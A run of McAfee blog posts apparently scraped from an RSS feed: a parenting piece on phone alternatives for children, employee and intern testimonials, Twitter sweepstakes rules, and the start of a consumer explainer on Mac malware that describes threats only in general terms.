The post Smartphone Alternatives for Free-Ranging Kids appeared first on McAfee Blogs.

]]>
Child using smartphone

Smartphone Alternatives for Free-Ranging Kids

A popular topic in our blogs is “when to buy a child a smartphone,” and for good reason. It’s an important conversation, one that calls for plenty of research and reflection as you look to balance the risks and rewards of giving your child a smartphone. Maybe you’ve already arrived at your answer and decided that your child isn’t ready—yet you still like the idea of using technology to keep in touch with your kiddo. If so, you still have options.

Why is smartphone ownership for children on the rise?

And that’s the thing. We want to keep in touch with our kids. We’ve seen studies and heard anecdotal references time and time again: one of the top reasons parents give a child a smartphone is “to stay in touch.” Whatever the reason parents cite, smartphone ownership by young users is on the rise. According to recent research from Common Sense Media, 19% of eight-year-olds in the U.S. owned a smartphone in 2019, compared to just 11% in 2015. (Nearly double!) Looking at older tweens, 69% of twelve-year-olds owned one, whereas that number was just 41% in 2015.

As these numbers rise, it begs some questions about how families can benefit from giving a smartphone to a child, particularly a younger one. One thought that quickly comes to mind is that families have a lot to juggle with jobs, school, activities, play dates, and so forth all in the mix. Smartphones help us keep on top of it all. With texting, calls, calendars, and GPS, it seems to offer some easy answers when it comes to keeping organized and on schedule. Likewise, the reality is that we have households where parents work multiple jobs or keep hours that go outside the regular 9-to-5, which makes staying connected that much more important, to the degree that it’s a near necessity.

Another thought around the rise of young smartphone owners is around a desire to help our kids become more independent, or at least semi-independent with some supervision. Maybe that’s letting them walk to school or a friend’s house, all with the reassurance that you can track where they are with GPS and feel good knowing they can get in touch with you quickly if they need to (and vice-versa). 

Free-Range Parenting and Smartphone Technology

Taking that approach a step further is the re-invigorated notion of “free-range parenting,” which harkens back to the days of the 70’s, 80’s and even earlier when kids were simply sent out of the house to go roam around the neighborhood and playgrounds with friends until suppertime. The pros and cons of allowing your child to explore their world more freely and to do so with less direct supervision is a conversation unto itself. Local laws vary, as do family situations, not to mention a child’s age and overall level of preparedness. So while free-range parenting is a snappy phrase, it’s a rather complex topic. I don’t bring it up glibly. Yet, it’s a conversation that’s been making the rounds in parenting blogs in recent years. Now, with how pervasive smartphone ownership has become, the conversation gets that much more interesting. But is a smartphone really the best tool here?

The flipside is that a smartphone, for all its benefits, like instant messaging, texting, location tracking, family calendars, and good old phone calls, obviously has its drawbacks when they’re in the hands of young kids. A smartphone an open door to the broader internet—social media, games, endless hours of videos, not to mention content that you know is not appropriate for them. It’s a world that no child should be thrown into cold. Just like learning to walk, it should be entered gradually, in baby steps. 

Stay in Touch without the Smartphone

And thankfully there are devices that are built just for that, while still giving families the means “to stay in touch” without introducing the risks of the internet to young children at too soon an age. In short, you don’t need a smartphone to get all the benefits of a smartphone, at least when it comes to keeping tabs on your children. 

What follows are a few options you can check out and research for yourself. Know that I’m not personally endorsing or recommending any particular brand, device, or phone here. My aim is to give you a nudge into an initial direction with a quick overview of what’s out there so that you can make a choice that works great for your family. Let’s take a look:

Flip Phones

The trusty flip phone. Rugged. Low-cost. Long battery life. Together, that makes them a fine option for kids. The options for them are quite broad, where you can get phones that are essentially just phones and nothing else, to other models that include cameras, push-to-talk walkie-talkie communications, and slide-out keyboards for texting. Doing a little research online will turn up numerous lists of the “best” flip phones and give you a strong idea of which one has the features you want (and don’t want) for your child.

Cellular and Wi-Fi Walkie-Talkies

An interesting and relatively recent entry into the “just for kids” phone market is the relay phone. In actuality, the relay looks more like a small speaker that’s the size of a standard sticky note and the width of an ice cream sandwich, which is quite practical. Kids can clip it on to their backpack, pop it in their pocket, or wear it on an armband. With a big button in the center, it gives kids a screen-free, push-to-talk phone that works with cellular and Wi-Fi networks. The other great feature for parents and their free-ranging kids is the combination of GPS tracking and geofencing. This way, you can always know where your children are and get alerts if they stray from the geofenced area you prescribe (like a few blocks around your home or a route to and from school). Additionally, it includes SOS emergency alerts, where five quick taps of the button will send an instant notification.

Smart Watches for Kids

Similar to the above, the U.S. mobile carrier Verizon offers a smart watch for children called the GizmoWatch2. At first glance, it looks like many other smart watches on the market but with a twist: you can load it with up to 10 contacts that you approve, so your child can text or call them with the push of a button. And like the relay phone, it also has GPS technology that allows you to instantly locate your child and get alerts when they step outside of their geofenced area. Other features include a step counter, tasks and reminders, plus a calendar function for setting a schedule. And yes, it’s a watch too. Pretty convenient, as it’s simply something that your child can wear.

For families in the EU, XPLORA offers a range of smart watches for kids that are currently available for online shopping in UK, Germany, Spain, France and Poland, and in selected retail stores. Another option for UK families is the Vodaphone V-Kids Watch, which offers GPS tracking, voice messaging, and an SOS button as well.

First Phones for Kids

On the more fully featured side, Gabb Wireless offers a phone and network made for young users. The look and feel of this device is more like a smartphone, yet the functionality and apps are narrowed down to the basics. It includes messaging, a camera, and things like a calculator, voice recorder, and calendar. What’s missing are social media apps, games, and internet browsing (and everything that comes with that). It’s available in the lower 48 states of the U.S. (for now).

Giving Your Child an “Old” Smartphone

One option for parents is to give a child an old smartphone, say a phone that might be otherwise destined for a swap at the mobile phone shop, and to “dumb it down” by removing everything but the most essential of apps. However, as you are certainly aware, kids are smart. And curious. Count on them figuring out how to make that dumb phone smart again by reloading apps on their own. One more thing to keep in mind is that your old data and passwords may be on this phone, so you’d want to reset your phone completely, like back to the original factory settings, to avoid any access or data issues. You’d also want to pick up antivirus for your iOS or Android phone and apply some parental controls to it as well. 

So while this route may feel like you’re getting some extra mileage out of a phone and giving your child the means to stay in touch, know that it comes with those risks. With that, I don’t recommend this for the younger ones in your life.

Thinking Twice About Smartphones for Kids

Just as you want to monitor where your child is and what they’re doing out in the neighborhood, the same holds true for the internet. That’s a good a reason as any to put some serious thought before you put a smartphone in your child’s hands. As we’ve seen, the good news is that you don’t need a smartphone to keep in touch with your child. Yet more reassuring is that mobile carriers and technology companies are paying attention to the concerns that parents have and creating products that address them. Research your options and be sure to share what you find with other parents. You may start something special in your circle of friends.  

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Smartphone Alternatives for Free-Ranging Kids appeared first on McAfee Blogs.

]]>
Women in Sales Part 2: Skilling up for a Career in Cybersecurity Sales https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-2-skilling-up-for-a-career-in-cybersecurity-sales/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-2-skilling-up-for-a-career-in-cybersecurity-sales/#respond Thu, 30 Jul 2020 21:24:16 +0000 /blogs/?p=104250

McAfee fosters an inclusive environment where we value varied life experiences. To showcase women who are making an impact and inspire others, we launched our Women in Sales Series.  In Part 1, McAfee women described industry opportunities and how they continue to break boundaries to develop rewarding careers.  Here in Part 2, we introduce women whose unique past experiences helped shape their career paths. They share critical skills for success and words of encouragement for those considering a career in sales.  Practice clear communication and collaboration: “In […]

The post Women in Sales Part 2: Skilling up for a Career in Cybersecurity Sales appeared first on McAfee Blogs.

]]>

McAfee fosters an inclusive environment where we value varied life experiences. To showcase women who are making an impact and inspire otherswe launched our Women in Sales Series. 

In Part 1McAfee women described industry opportunities and how they continue to break boundaries to develop rewarding careers. 

Here in Part 2, we introduce women whose unique past experiences helped shape their career paths. They share critical skills for success and words of encouragement for those considering a career in sales. 


Practice clear c
ommunication and collaboration: “In a sales role, you constantly communicate with customers to help them achieve their desired outcomes with evolving solutions. We need people who can maintain relationships while demonstrating their relevance to stakeholders, C-level and highly technical engineer roles. My more successful peers are those who can navigate through various layers of organizational complexity because they know it takes dedication and expertise from everyone on the team to close deals. Keeping team members informed and constantly collaborating is critical throughout every step of the sales process.” 

 Amy, Enterprise Sales, Charlotte, North Carolina 

Be confident and take the leap: My experience started in IT after I graduated from college. Later, I joined technical support at McAfee and was asked if I was interested in a sales engineering role. I didn’t have the experience but was excited to try something new and made the decision to leap into a sales career. My experience in technical support helped me get up to speed in sales engineering, and I love it.”  

— Carine, Presales/Sales Engineering, Plano, Texas 


Build relationships and know the business:
If you’re focused and determined, you can succeed in sales. The most challenging part for me was picking up the sales piece as I already had a technical background. If you want to get into presales, half is relating to people and building strong relationships with the customer. The other half is engineering, and here, you need to learn enough of everything to hold knowledgeable conversations. Investigating resources quickly to source answers for the customer is also important. Be confident in yourself and your abilities.” 

— Elizabeth, Presales/Sales Engineering, Plano, Texas 

Find your passion, then network: “I’ve found a degree in psychology handy in a sales career. It is easier for me to engage with people, read a situation and build rapport. With some experience, I saw a future in sales and carved out my career path. I thought the life of a field sales rep was exciting  greater earnings, more flexibility and so on. Once I knew I had found my path, I looked for opportunities to network with sales executives, get exposure and learn from them. Networking enabled me to build a name for myself and a personal brand.” 

— Kate, Enterprise Sales – Federal, Washington, DC 

 

Leverage your transferable skills: “I previously worked in real estate designing high rise office buildings. I eventually wanted to try a different field. My presentation and project management skills were transferable, so I changed industries to telecom and began as a technical trainer. I eventually moved into a sales engineering role here at McAfee and am currently in a sales architect role.” 

— Melissa, Presales/Sales Engineering, Plano, Texas 

Understand the customer’s needs: “Sales is about cultivating relationships, understanding the customers’ needs and finding the best solution for them. These are the essential skills when considering a career in sales. You’ll never know if you can be successful if you don’t attempt it.  

— Marta, Inside Sales, Cork, Ireland 



Build a social platform and know when to speak up
: “Look at your collective skillset and see how you can leverage it for sales. Be sure to showcase it on your resume and social channels like LinkedIn. Then network, network, network. Have a few good mentors in your corner who can make some connections for you internally and externally. But remember, are responsible for your career  you must speak up and make sure your career goals and desired career path are known by leadership.” 

— Paige, Sales Operations, Plano, Texas 


Spend time on people
: “When I first began my career in sales operations, it helped me immensely to try and understand other’s points of view. You cannot find success in a vacuum and people are complex. My advice is to take time to understand people. Then, with dedication and hard work, the value you add will show through.” 

— Preet, Sales Operations, Plano, Texas



Speak the language
: “Presales is a bridge that links the technical to the sale, which means you need to understand two languages: technical and business. It is challenging, but also very exciting. For those looking to enter the industry, I recommend you leverage social media and connect with people to tap into their wisdom. This is how I found my current position. 

— Sandra, Presales/Sales Engineering, Sydney, Australia


Understand your team and global partners: “Go for it! The sales industry is unlike any other. A sales role offers an opportunity for anyone with a willingness to put in the work. In my position, there are two key indicators  for success  understanding what motivates my team and navigating the nuances of interacting with diverse, global partners. 

— Sophie, Sales Project Management, Cork, Ireland 


It takes not only the range of talent these women bring to the table, but also passion, motivation and courage to thrive. 
Next week, meet more McAfee women in sales who will provide their perspectives on traits needed for a successful career in cybersecurity sales.  

Interested in joining a company that supports inclusion and belonging? Search our jobsSubscribe to job alerts.

The post Women in Sales Part 2: Skilling up for a Career in Cybersecurity Sales appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-2-skilling-up-for-a-career-in-cybersecurity-sales/feed/ 0
What is a McAfee Internship Like? 10 Interns Share Perspectives https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/what-is-a-mcafee-internship-like-10-interns-share-perspectives/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/what-is-a-mcafee-internship-like-10-interns-share-perspectives/#respond Thu, 30 Jul 2020 15:55:42 +0000 /blogs/?p=104202

At McAfee, we foster meaningful internship experiences within our fast-paced world of cybersecurity.  We know it’s the next generation that will build tomorrow’s technology solutions. McAfee interns make substantial contributions and are valued as global team members, joining our mission to protect all that matters.  This year, McAfee took the intern experience virtual due to the global pandemic. While not our typical experience, this year’s interns continue to thrive. To celebrate National Intern Day, we asked our interns around the world to share insights gained from their experiences. “My new colleagues and leaders have helped me transition from college life to my full-time internship at […]

The post What is a McAfee Internship Like? 10 Interns Share Perspectives appeared first on McAfee Blogs.

]]>

At McAfee, we foster meaningful internship experiences within our fast-paced world of cybersecurity We know it’s the next generation that will build tomorrow’s technology solutions. McAfee interns make substantial contributions and are valued as global team membersjoining our mission to protect all that matters. 

This year, McAfee took the intern experience virtual due to the global pandemic. While not our typical experience, this year’s interns continue to thrive. To celebrate National Intern Day, we asked our interns around the world to share insights gained from their experiences.

My new colleagues and leaders have helped me transition from college life to my full-time internship at McAfeeThe people I work with put the customer at the core and are driven to provide the best quality security software. Since day one, I’ve always felt part of the McAfee family.” 

Aaron, QA Engineering and Software Development Intern, Cork

 

I was interested in McAfee because of the culture. I wanted to work at a place where I was treated well. Everyone is willing to step in and help you get back on the right track. I’ve had to adapt to an online internship environment, but I’m being equipped well to learn and do my work, and I’m really grateful to still have this opportunity. 

Benaisha, Finance Intern, Plano

 

I was interested in interning a second year at McAfee because of the company’s values and workplace practices. I also enjoyed working in a positive and constructive atmosphere—it’s important to work for a company that wants to help you grow. Ive been able to collaborate and work with people from all over the globe and increase my communication skillsMy biggest takeaway is to never limit yourself and always be openminded in your career field. Today, I’m confident in my capabilities because of the exposure McAfee has given me. 

Blair, People Success Intern, Plano


The current times have made me appreciate how important communication and great teamwork truly is. My colleagues have been excellent mentors and are always available when I have questions. During my time at McAfee, I have taken on the responsibility of QA Lead on a project and have become involved with employee resource groups, including the Women in Security (WISE) Community and Cork Culture Club. 

Deirdre, QA Engineering and Software Development Intern, Cork


“McAfee provided a platform where I
truly feel engaged by various aspects of technology. Most importantly, my work involving foundations for security and data exchange layer has enhanced the quality of my programming. am now more comfortable with the organizational structure, seeking appropriate information and obtaining specific knowledge for responsible project ownership. I am greatly inspired by the vast, positive response by my team in creating an overall environment which fosters growth and career development.” 

Divya, Technical Intern, Bangalore


When I visited the Córdoba site on a college trip, I liked what my eyes sawa very comfortable workplace environment to grow professionally. I viewed this internship as an opportunity to gain experience and knowledge alongside the best professionals in the field. I am learning new technologies, new work approachesinteracting with other professionals and working together as a team, as well as improving my English and living the McAfee Values.” 

Emiliano, Undergraduate Technical InternCórdoba


“I’m learning how the cloud computing industry is actively changing our world. My McAfee team has helped broaden my understanding of computer networking/provisioning, building on what I’ve learned at my university and filling in the gaps. 
This experience has been incredible because we are constantly learning new technologies as a team. Thank you, McAfee, for continuing your internship program during the pandemic.”

Francisco, DevOps Engineer Intern, Santa Clara

 

 “I wanted to learn more about the ever-evolving cybersecurity world, which is applicable to any and every field or industry. This internship has allowed me to gain knowledge about the private sector while also fulfilling my interest in law. I’ve learned attention to detail and how the ability to effectively negotiate is essential. All the contracts and agreements that are processed through our team are highly important to the business. This is the most impactful and meaningful internship I’ve had in my entire college career. McAfee’s culture is inclusive — and even though I’m an undergraduate intern who is here for a short time, I really feel part of the team.” 

Gia, Public Sector Legal Intern, Reston

 

McAfee became one of the top companies on my list during my time in an internship program at school as I learned about our products and mission. I wanted to learn more about cybersecurity and to expand my horizons. I have the opportunity to help maintain and improve the system of testing environments for engineers across McAfee. The people I work with regularly provide feedback, guidance and are extremely helpful. McAfee is truly a great place to work, to learn, and more importantly, it’s filled with amazing and talented individuals. Im extremely grateful for the opportunity and thankful to have this incredible experience.”  

Jeff, Software Development Engineering Intern, Hillsboro


“I’m gaining skills and experiences I cannot learn in school. While working on different projects, I’ve been able to familiarize myself with existing UI patterns, work with product managers and engineers to gauge the feasibility of my solutions, receive feedback, iterate on my designs and learn from an amazing community of people.”
  

Katie, UX Design Intern, Santa Clara


Follow
@LifeAtMcAfee on Instagram and @McAfee on Twitterto see what working at McAfee is all about. Interested in a new career opportunity at McAfeeExplore our careers. 

The post What is a McAfee Internship Like? 10 Interns Share Perspectives appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/what-is-a-mcafee-internship-like-10-interns-share-perspectives/feed/ 0
Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! https://www.mcafee.com/blogs/consumer/security-is-a-feeling-with-the-mcafee-securemylife-rt2win-sweepstakes/ Thu, 30 Jul 2020 15:55:11 +0000 /blogs/?p=104094 Security is a Feeling-  Share it with the McAfee #SecureMyLife RT2Win Sweepstakes! The word ‘security’ means something unique to everyone. Security is a feeling, an emotion, a sense of belonging and place: It could be the feeling of cuddling as a family in a pillow fort, making sure your house is locked at night, or […]

The post Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>
Security is a Feeling-  Share it with the McAfee #SecureMyLife RT2Win Sweepstakes!

The word ‘security’ means something unique to everyone. Security is a feeling, an emotion, a sense of belonging and place: It could be the feeling of cuddling as a family in a pillow fort, making sure your house is locked at night, or always having a smartphone in your pocket for directions or an emergency.

Though our digital devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee team for more information.

While all this dazzling technology has its appeal, we here at McAfee understand the importance of creating new security solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving two [2] lucky people the chance to win an Amazon gift card. Not a customer? Not a problem!  Simply retweet one of our contest tweets with the required hashtag between August 3rd, 2020 – August 16th 2020 for your chance to win. Follow the instructions below to enter, and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • There will be four [4] sweepstakes tweets will be released at the following schedule including the hashtags: #RT2Win #Sweepstakes AND #SecureMyLife
    • Monday, August 3, 2020 at 9:05AM PST
    • Thursday, August 6, 2020 at 9:05AM PST
    • Monday, August 10, 2020 at 9:05AM PST
    • Thursday, August 13, 2020 at 9:05AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #SecureMyLife hashtags must be included to be entered.
  • Sweepstakes will end on Monday August16, 2020  at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday August 19, 2020 via Twitter direct message.
  • Limit one entry per person.

     1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include ““#RT2Win, #Sweepstakes, and #SecureMyLife” for a chance at an Amazon Gift card. Two [2] winners will be selected by  10:00 AM PT August 19, 2020, for a total of two [2] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

McAfee #SecureMyLife    RT2Win   Sweepstakes Terms and Conditions

     2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win  Sweepstakes will be conducted from August 3rd through August 16th. All entries for each day of the #SecureMyLife  RT2Win Sweepstakes must be received during the time allotted for the #RT2Win   Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win Sweepstakes. The #SecureMyLife RT2Win Sweepstakes duration is as follows:

#RT2Win   Sweepstakes:

  • Begins: Monday, August 3rd, 2020 at 7:00am PST
  • Ends: Sunday, August 16, 2020 at 11:59 PST
    • Opportunity 1: Monday, August 3, 2020 at 9:05AM PST
    • Opportunity 2: Thursday, August 6, 2020 at 9:05AM PST
    • Opportunity 3: Monday, August 10, 2020 at 9:05AM PST
    • Opportunity 4: Thursday, August 13, 2020 at 9:05AM PST
  • Winners will be announced: by 10:00AM PST August 19, 2020

For the #SecureMyLife RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #SecureMyLifeSecureMyLife RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #SecureMyLife, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfee, #SecureMyLife, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #SecureMyLife, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person. 

Two (2) winners will be chosen for the #McAfee #SecureMyLife Sweepstakes tweet from the viable pool of entries that retweeted and included #. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on August 19, 2020 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC. 

     3. Eligibility: 

McAfee’s #RT2Win   Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #SecureMyLifeSecureMyLife RT2Win Sweepstakes begins and live in a jurisdiction where this prize and #SecureMyLifeSecureMyLife RT2Win  Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

     4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #SecureMyLifeSecureMyLife RT2Win   Sweepstakes periods. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #SecureMyLifeSecureMyLife RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

     5.Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by August 19, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

     6. Prizes: 

The prizes for the #SecureMyLifeRT2Win Sweepstakes are two [2] $100 Amazon e-gift cards  (approximate retail value “ARV” of the prize is $100   USD; the total ARV of all gift cards is $200 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLifeRT2Win   Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

      7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #SecureMyLifeRT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the #SecureMyLifeRT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #SecureMyLifeRT2Win   Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #SecureMyLifeRT2Win   Sweepstakes -related activity, or participation in the #SecureMyLifeRT2Win  Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

      8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.

     2. Use of Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use           your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without               further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where           prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize           information for advertising, marketing, and promotional purposes without further permission or compensation.

         By entering this  sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

      9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #SecureMyLifeRT2Win   Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #SecureMyLifeRT2Win  Sweepstakes.

     10.Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLifeRT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLifeRT2Win   Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

     11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

     12.Privacy Notice: 

Personal information obtained in connection with this prize McAfee Day #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before August 16th 2021 to the address listed below, Attn: #RT2Win Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Consumer Content Marketing. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>
Can Macs get Viruses? https://www.mcafee.com/blogs/consumer/can-macs-get-viruses/ https://www.mcafee.com/blogs/consumer/can-macs-get-viruses/#respond Thu, 30 Jul 2020 15:21:19 +0000 /blogs/?p=104043

Can Macs get viruses? In addition to their ability to work seamlessly with Apple devices, many users prefer Mac computers because of their perceived “inherent” security features. Apple also notifies users of periodic updates to make sure that every generation of Apple product has the most secure software version. And while Apple does go to […]

The post Can Macs get Viruses? appeared first on McAfee Blogs.

]]>

Can Macs get viruses?

In addition to their ability to work seamlessly with Apple devices, many users prefer Mac computers because of their perceived “inherent” security features. Apple also notifies users of periodic updates to make sure that every generation of Apple product has the most secure software version. And while Apple does go to great lengths to keep its devices safe by making it difficult to download any/all software foreign to its official Apple application store, this does NOT mean your Mac is immune to all computer viruses.

What is a virus?

A virus is any piece of malicious software that invades your computer system, then copies itself. They can also then spread to other systems. This could result in stolen personal information or financial data, corrupted files, or crypto-hijacking. Here are some of the common viruses that infect Apple devices, and some of the best ways to protect your computer from them.

CookieMiner

CookieMiner is malware that captures Chrome browser authentication cookies primarily associated with cryptocurrency exchanges. The sophisticated CookieMiner code bypasses strict security protocols of both Apple and cryptocurrency exchanges by stealing information such as passwords, usernames, and other login credential data. It can even capture backed-up data from iTunes accounts that can be used to open cryptocurrency wallets and then steal cryptocurrencies such as Bitcoin, Ethereum, and XRP. Stealing valuable cryptocurrency isn’t enough for CookieMiner hackers, however, as they also use this malware to load cryptocurrency mining software onto MacBooks to mine Koto, a little-known Japanese cryptocurrency.

Besides a significantly lighter cyber wallet, there are some other clues that your Mac may be infected by the CookieMiner virus. As a cryptocurrency miner, CookieMiner uses a significant amount of a CPU’s processing power and therefore, infected Macs will be slow to complete even basic computing tasks. You may also notice that other software applications on your Mac don’t work as well as they should or stop working completely, or tour Mac could also overheat.

OSX/Dok… Next Generation

OSX/Dok is malware that commandeers data traffic entering and leaving a Mac computer without your knowledge. It reroutes this traffic through a bogus proxy server to then obtain access to all your communications. The malware is able to counter Apple’s security because it’s signed by a legitimate developer certificate that validates its authenticity. Through OSX/Dok, a hacker even has access to data that moves through SSL-TLS encrypted connections such as banking information. This is especially troubling since Apple devices such as iPhones, iPads, and MacBooks are commonly synced to operate together.

While the original version of OSX/Dok was thwarted when Apple disabled its associated developer certificate, later versions have popped up using different developer certificates. Apple devices are vulnerable to this malware mainly when users are duped to download files through email phishing scams. Once the software is installed on your computer, it immediately takes over critical operations. Users then most often see a message that the system has detected a security issue. The malware prompts users to install an update, and it then locks up all operations until the user submits a password to install it. After obtaining the password, the malware then has full administrative privileges to take control of the device.

Crossrider

Crossrider is a variant on the OSX/Shlayer malware and uses a fake Adobe Flash player installer to dump other pieces of malicious code onto your Apple devices. Users mistakenly download the fake installer when they’re sent a message to update Adobe Flash player. If you follow the link, you’ll mistakenly download the fake installer instead of the real update from the Adobe website. The fake installer message will then prompt you to submit your password so that the software can make changes to your system and install the program.

Advanced Mac Cleaner, Chumsearch Safari Extension, and MyShopCoupon+ are some of the items that are installed through the fake Adobe Flash player installer. While MyShopCoupon+ and Chumsearch Safari Extension do cause minor annoyances to users, Advanced Mac Cleaner can cost you much more if you’re not careful. Advanced Mac Cleaner appears to run a security scan of your system and identifies several issues. It then asks the user to pay $107 to activate the program’s clean-up feature.

Macros Viruses… From Microsoft Word

Macro viruses used to be a problem that only PC users face. Macros are pieces of code that programmers embed within applications to automate routine tasks. The code, which is written in Visual Basic, can be used to hijack applications and do harm when users open popular Microsoft Office products such as Word, Excel, or Project. Visual Basic commands in macros can result in deleted or corrupted files. When you use Word to open an infected file, Word catches the virus and passes it on to every Word document that you subsequently create.

